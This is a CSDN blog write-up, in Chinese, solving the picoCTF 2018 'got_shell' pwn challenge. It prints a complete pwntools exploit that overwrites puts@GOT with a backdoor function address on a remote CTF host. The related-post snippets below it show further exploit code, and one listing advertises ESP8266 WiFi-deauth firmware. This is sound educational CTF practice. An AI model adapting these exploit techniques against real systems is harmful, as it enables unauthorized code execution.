[BUUCTF]PWN——picoctf_2018_got_shell

最新推荐文章于 2022-07-17 13:58:27 发布
最新推荐文章于 2022-07-17 13:58:27 发布
阅读量355 收藏 1
点赞数
分类专栏: PWN BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/112985686
版权

picoctf_2018_got_shell

附件

步骤:

  1. 例行检查,32位程序,开启了nx
    在这里插入图片描述
  2. 本地试运行一下,看看大概的情况,提示了两个地址
    在这里插入图片描述
  3. 32位ida载入,检索字符串发现了后门,shell_addr=0x804854B
    在这里插入图片描述
  4. main()
    在这里插入图片描述
    让我们将内容写入到我们选择的地址上。一开始想尝试溢出后来发现没有溢出漏洞
    那么就根据程序的功能,将后门写入到puts@got上,这样在执行第16行的puts的时候我们就能获取shell了

完整exp

from pwn import *

r=remote('node3.buuoj.cn',29252)

elf=ELF('./PicoCTF_2018_got-shell')

puts_got=elf.got['puts']
shell_addr=0x804854B

r.recvuntil("I'll let you write one 4 byte value to memory. Where would you like to write this 4 byte value?")
r.sendline(hex(puts_got))
r.recv()
r.sendline(hex(shell_addr))

r.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
picoctf_2018_got_shell
z1r0的博客
12-30 428
picoctf_2018_got_shell 查看保护 可以将一个地址改掉,直接改exit的got为win的地址即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25944) else: r = process(file_name) elf =
[BUUCTF-pwn]——picoctf_2018_got_shell
Y_peak的博客
02-24 436
[BUUCTF-pwn]——picoctf_2018_got_shell 题目地址:https://buuoj.cn/challenges#picoctf_2018_got_shell 题目: 还是先checksec查看一下,32位程序。 IDA中看看,竟然有后门函数win。 思路 程序中没有栈溢出,也没有格式化字符串漏洞和堆漏洞。 那么我们就可以考虑一下逻辑的漏洞 我们看到v3是一个指针,我们可以向里面写地址(%x是以十六进制读入),然后我们也可以向v4里面写入地址。并且我们可以看到*v3
BUUCTF pwn wp 76 - 80
fa1c4的blog
11-16 878
cmcc_pwnme2 picoctf_2018_got_shell actf_2019_babystack picoctf_2018_can_you_gets_me mrctf2020_easy_equation
BUUCTF-pwn(10)
njh18790816639的博客
01-08 340
picoctf_2018_shellcode 题目很很简单! from pwn import * context(log_level='debug',os='linux',arch='i386') binary = './PicoCTF_2018_shellcode' r = remote('node4.buuoj.cn',25585) #r = process(binary) elf = ELF(binary) shellcode = asm(shellcraft.sh()) r.recvunti
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
在电子设计自动化(EDA)领域,Verilog HDL是一种广泛使用的硬件描述语言,用于描述数字逻辑系统,包括微处理器、接口电路以及各种嵌入式系统。本教程将深入探讨如何利用Verilog HDL实现脉冲宽度调制(PWM)。...
PWN.rar_PWN
最新发布
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
BUUCTF刷题5
m0_51251108的博客
10-30 553
题目:axb_2019_heap:actf_2019_babystack:picoctf_2018_got_shell:[极客大挑战 2019]Not Bad:gyctf_2020_force:picoctf_2018_can_you_gets_me:mrctf2020_easy_equation:wdb_2018_2nd_easyfmt:ciscn_2019_es_1:axb_2019_fmt64: axb_2019_heap: 参考师傅:buuctf axb_2019_heap_R1nd0的博客-CSD
PWN-PRACTICE-BUUCTF-20
P1umH0的博客
09-07 171
PWN-PRACTICE-BUUCTF-20actf_2019_babystackpicoctf_2018_can_you_gets_mepicoctf_2018_got_shellmrctf2020_easy_equation actf_2019_babystack 两次栈迁移 # -*- coding:utf-8 -*- from pwn import * #context.log_level="debug" #io=process("./ACTF_2019_babystack") io=remote(
21 08 08学习总结
eeeeeight的博客
08-10 1126
21.08.08学习总结 Tags: learning experience 不知道什么时间-不知道什么时间: BUU刷题 re找门: xor: 一个数xor同一个数两次之后仍然是其本身 reverse3: 一个base64的加密, 主函数里有个+i的操作, 把+i消去之后base64解密就行了, 但是因为是萌新第一次接触re的base64, 于是就自己写了个base64的加密与解密练手(ida的ctrl e是直接选取字符串) helloword: jeb打开, 就能直接找到了 SimpleRev: 前面有
picoctf_2018_echooo
doudoudedi
09-23 522
发现是简单的32位格式化字符串但是并且flag存了栈上,直接泄漏就行了,但是内存是小端存储的,所以倒序输出即可 exp: from pwn import * #p=process('./PicoCTF_2018_echooo') p=remote('node3.buuoj.cn',26798) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) p.sendlineafter('> ',p
buuoj Pwn writeup 86-90
yongbaoii的博客
03-08 236
86 axb_2019_brop64 保护 花里胡哨的。 平平无奇栈溢出。 from pwn import * context.log_level="debug" r = remote('node3.buuoj.cn',29649) elf = ELF('./86') libc = ELF("./64/libc-2.23.so") main=0x4007d6 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] pop_rdi=0x400963 r.r
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 397
buuctf-pwn 001-016题wp
[buuctf]PicoCTF_2018_shellcode
逆向萌新的博客
07-17 410
[buuctf]PicoCTF_2018_shellcode,这道题主要是考你的shellcode编写能力和使用能力,或者是利用pwntools自动生成的shellcode进行利用
[BUUCTF]PWN——picoctf_2018_shellcode
mcmuyanga的博客
01-23 566
picoctf_2018_shellcode 附件 步骤 虽然题目都叫shellcode了,肯定没有开什么保护,但还是例行检查,32位程序 本地试运行一下,看看大概的情况 32位ida打开,没法f5,只能看汇编了,汇编太长就不截图了,做题做多了,直接看vlun,一般这个函数都有漏洞 看到vlun里调用了gets,参数是ebp+arg_0,结合main函数我们可以看到,gets 函数写入的地址即为 [ebp+var_A0] 对应的地址 然后在main函数里又发现,我们gets写入的地址,下
[BUUCTF-pwn]——picoctf_2018_shellcode
Y_peak的博客
02-24 362
[BUUCTF-pwn]——picoctf_2018_shellcode 题目地址:https://buuoj.cn/challenges#picoctf_2018_shellcode 论学好汇编的重要性。在这道题得到了体现。 第一次面向汇编, 说实话看的挺慢的。 话不多说 直接上 checksec看下 IDA中没法发反汇编,只能面向汇编编程。无法反汇编是call eax的问题,但是这个指令应该没有错,只能说这个时间eax存储着一个函数地址。也就是[ebp+var_A0]偏移处的函数。 我们可以发现
[BUUCTF]PWN------warmup_csaw_2016
BangSen1的博客
01-14 534
warmup_csaw_2016 例行检查 ,64位,无保护 运行一下,没什么信息。 用64位IDA打开,查看字符串,看到了cat flag,进去瞧瞧 可以看到这个函数的功能就是输出flag,记录下他的地址 flag_addr=0x40060D 再回到主函数瞧瞧,可以看到最后是输出了v5,gets函数并没有限制长度,因此存在溢出漏洞。v5的大小是0x40,因此只要我们输入的字符串长度=0x40+8(64位ebp的长度)即可溢出到返回地址,再将返回地址覆盖输出flag的那个函数地址即可 得到fla
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值